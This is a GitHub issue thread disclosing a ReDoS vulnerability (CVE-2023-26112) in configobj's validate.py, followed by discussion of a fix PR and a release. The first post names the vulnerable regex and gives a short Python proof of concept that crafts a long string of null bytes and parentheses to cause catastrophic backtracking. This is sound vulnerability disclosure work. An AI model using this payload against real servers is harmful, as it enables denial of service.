A ReDoS vulnerability exists in ./src/configobj/validate.py

[DarkTinia]

The affected code is located in validate.py-line660. It uses the vulnerable regular expression (.+?)\((.*)\). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below

from configobj.validate import Validator
value = "aaa"
i = 10
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
newval1 = vtor.check(attack, value)

I see many projects referencing this file, when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.

[robdennis]

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

[yewhen]

Is this security hole fixed?

[carnil]

CVE-2023-26112 appears to have been assigned for this issue.

[swf504]

just ping， if any PR fixed this CVE?

[robdennis]

I have not, and I’m not in a position to provide one. I characterized this as a CVE on the effecting server-side config and not something I’d expect a malicious user to be able to trigger.

…

On Sun, Apr 23, 2023 at 4:07 AM swf504 ***@***.***> wrote: just ping， if any PR fixed this CVE? — Reply to this email directly, view it on GitHub <#232 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AAC4YQQ3AWTPRK6GA3LPISLXCTPLXANCNFSM6AAAAAAUIUHBTI> . You are receiving this because you commented.Message ID: ***@***.***>

[cdcadman]

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

@robdennis I opened a PR, #236. Please let me know if you need me to change anything.

[ameka-trustwave]

Any update on this one? Thanks

[thebaptiste]

A new release including a fix (#236 ?) would be appreciated.

[azuterios]

Dear https://github.com/DiffSK Team, please push a new release, containing these changes. Thank you for the prompt support!

[jelmer]

#236 is now merged; I'm trying to work out how to do a release.